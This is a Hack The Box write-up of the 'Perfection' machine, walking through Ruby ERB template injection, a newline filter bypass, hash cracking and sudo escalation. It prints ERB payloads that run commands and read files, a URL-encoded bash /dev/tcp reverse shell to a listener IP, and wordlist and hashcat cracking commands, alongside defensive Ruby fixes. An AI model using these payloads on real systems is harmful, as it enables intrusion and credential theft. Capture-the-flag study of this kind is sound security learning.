
Perfection Walkthrough (Hack The Box)

Easy Linux Hack the Box Hacking Walkthrough Web

Reconnaissance && Enumeration

  • Nmap scan results:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Uptime guess: 15.030 days (since Tue Dec 31 22:06:01 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • I spent some time browsing the website for anything interesting. I am not gonna lie, the site is both basic and neat.

  • After a while the weighted grade calculator caught my eye: it takes user input and echoes it back in the result, which is exactly the kind of input you want to poke at.

  • The page footer exposes the server as WEBrick 1.7.0, so I noted it down.

  • A bit of research confirmed that WEBrick is Ruby's bundled HTTP server library (shipped in the standard library for years and now distributed as the webrick gem), so the backend is Ruby.

  • Just as Python's Jinja2 is prone to SSTI, so is Ruby's ERB templating, and a calculator that reflects user input is an obvious place to test it. So I jumped the gun.

  • An article I found showcases SSTI on a WEBrick-based site; talk about being lucky, lol.

  • A Medium article helped me a lot with payloads for Ruby SSTI, but while testing them I couldn't get any valid results at first.

  • Below are some of the example ERB payloads for Ruby that I used for SSTI:

<%= system("whoami") %>  
<%= Dir.entries('/') %>  
<%= File.open('/example/arbitrary-file').read %>

Exploitation

  • Some payloads got through after small tweaks, but the page still rejected them as "Malicious Input". Hey, at least we got something.
  • No amount of URL encoding helped; the site apparently filters the symbols in the payload. Hmm…
  • I learnt that a URL-encoded newline (%0a) can bypass this kind of validation, so I prefixed the payload with it, and like magic it worked. The reason is a Ruby regex quirk: ^ and $ match at line boundaries, not at the start and end of the whole string, so a filter anchored with them only inspects the first line. The second line, carrying the ERB tag, passes the check untouched and is still rendered.
  • whoami returned no output. That is expected: Kernel#system runs the command and returns true/false, while the command's output goes to the server process's stdout, not into the rendered page. Backticks or %x() capture the output instead.
  • To confirm execution I made the target send a request to my machine, and the request arrived at my listener.
  • As everything works, it is time to brew the cursed reverse shell payload. It is the same %0a-prefixed ERB tag, URL-encoded (%25%3d is %=, %26 is &), wrapping a bash /dev/tcp reverse shell to my listener on 10.10.14.10:7001:
%0a<%25%3d+system("bash+-c+'exec+bash+-i+%26>/dev/tcp/10.10.14.10/7001+<%261'")+%25>
  • It worked, and we have a shell as user susan. User flag secured.
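To show why the newline prefix defeats the filter, here is an added Ruby example. It is not the box's code (the real validation regex is not on this page): a hypothetical check anchored with ^/$ sits beside one anchored with \A/\z, and an ERB render that concatenates the input into the template source sits beside one that passes the input as data to a fixed template. The inputs are constructed for the demo.

```ruby
require 'erb'

# Hypothetical server-side validation, modelled on the behaviour described
# above; the box's real regex is not on the page. In Ruby, ^ and $ are LINE
# anchors, so this regex only constrains the first line of the input.
WEAK_NAME_RE = /^[a-zA-Z0-9]+$/
# Hardened: \A and \z anchor to the start and end of the whole string.
STRICT_NAME_RE = /\A[a-zA-Z0-9]+\z/

def valid_weak?(input)
  input.match?(WEAK_NAME_RE)
end

def valid_strict?(input)
  input.match?(STRICT_NAME_RE)
end

# Vulnerable rendering: user input is interpolated into the TEMPLATE SOURCE,
# so any ERB tag inside it is compiled and evaluated as Ruby.
def render_unsafe(name)
  ERB.new("<p>Hello, #{name}</p>").result(binding)
end

# Safe rendering: the template is fixed, the input arrives as a variable and
# is HTML-escaped; ERB tags inside it are just text in the output.
def render_safe(name)
  template = ERB.new("<p>Hello, <%= ERB::Util.html_escape(name) %></p>")
  template.result_with_hash(name: name)
end

# Constructed inputs: a benign name and the newline-prefixed SSTI probe
# (on the wire the probe would be sent as susan%0a<%25%3d+7+*+191+%25>).
BENIGN  = "susan"
PAYLOAD = "susan\n<%= 7 * 191 %>"

if __FILE__ == $0
  [BENIGN, PAYLOAD].each do |input|
    puts "input=#{input.inspect}"
    puts "  weak check passes:   #{valid_weak?(input)}"
    puts "  strict check passes: #{valid_strict?(input)}"
    puts "  unsafe render:       #{render_unsafe(input).inspect}" if valid_weak?(input)
    puts "  safe render:         #{render_safe(input).inspect}"
  end
end
```

The weak check accepts the two-line payload and the unsafe render evaluates 7 * 191 to 1337 inside the page, which is the behaviour the box exhibits. The strict check rejects the same input, and even if it were let through, the safe render only ever prints the escaped tag text; both fixes are independent and a hardened app should have both.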

Privilege Escalation

  • While enumerating I found two other folders within user susan's home directory.
  • The Migration folder held an SQLite database file, so for a change I opened it on the target itself.
  • The database had a single table, users, holding password hashes for five users.
  • The hashes were SHA-256 digests.
  • I tried cracking them with my tool BananaCracker (previously sha256_cracker), but it failed.
  • I kept enumerating the system for privesc vectors and instead came across /var/mail.
  • The message in /var/mail/susan reads:
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be converted into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
  • Following those instructions, I wrote a Python script to generate the password list for user susan:
# Candidate passwords in the mailed format for first name "susan" (reversed: "nasus").
# Keyspace is 10^9 lines of roughly 20 bytes each, so expect a ~20 GB file.
output_file = "susan_nasus_password.txt"

with open(output_file, "w") as file:
    for number in range(1, 1_000_000_001):
        file.write(f"susan_nasus_{number}\n")

print(f"File '{output_file}' has been successfully created.")
  • The same list in one line of bash (writing the file once, rather than reopening it on every iteration; a billion echo calls still take a while):
output_file="susan_nasus_password.txt"
for ((i=1; i<=1000000000; i++)); do echo "susan_nasus_$i"; done > "$output_file"
  • With the new wordlist I fired up my tool again and got the password.
  • You can get my tool from here: BananaCracker (previously known as sha256_cracker). More features will be added by the time of your visit.
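Rather than writing a 20 GB wordlist to disk and feeding it to a cracker, the candidates can be generated and hashed in memory, since the mail gives the exact format and the only unknown is the integer. The Ruby example below is added here and is not the author's BananaCracker; the target hash is constructed from a made-up password in the mailed format, not taken from the box's database, and the search range is kept small for the demo.

```ruby
require 'digest'

# Build one candidate in the leaked format:
#   {firstname}_{firstname backwards}_{n}, with the first name lowercased.
def candidate(first_name, n)
  fn = first_name.downcase
  "#{fn}_#{fn.reverse}_#{n}"
end

# Stream candidates over the given integer range and compare SHA-256 digests.
# Returns the plaintext on a hit, nil otherwise. Nothing is written to disk;
# the full range 1..1_000_000_000 is ~20 GB as a wordlist but costs only
# CPU time here. Assumes the stored hash is plain, unsalted SHA-256 hex.
def crack_sha256(target_hex, first_name, range)
  target = target_hex.downcase
  range.each do |n|
    pw = candidate(first_name, n)
    return pw if Digest::SHA256.hexdigest(pw) == target
  end
  nil
end

# Constructed demo target: SHA-256 of a password in the expected format.
# This is NOT one of the hashes from the box's users table.
DEMO_TARGET = Digest::SHA256.hexdigest("susan_nasus_482913")

if __FILE__ == $0
  found = crack_sha256(DEMO_TARGET, "Susan", 1..1_000_000)
  puts found ? "cracked: #{found}" : "not found in range"
end
```

Pure Ruby is fine for the demo but slow for the full 10^9 keyspace; for the real job, a mask attack in hashcat does the same thing on the GPU without any wordlist, e.g. hashcat -m 1400 -a 3 -i --increment-min 13 hashes.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d' (mode 1400 is SHA2-256, -a 3 is mask mode, and the increment options step the digit count from one up to nine). Note that this attack is only feasible because the hashes are unsalted and SHA-256 is fast; a salted, slow KDF such as bcrypt or Argon2 would make the same 10^9 keyspace a serious effort.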
  • Using the password I logged in via SSH as user susan
  • I really wasn't expecting this twist; I was hoping for more steps, but anyway I am glad. See for yourself, lol.
  • User susan can run sudo without a password, so root is a single command away.
  • Got the root flag.

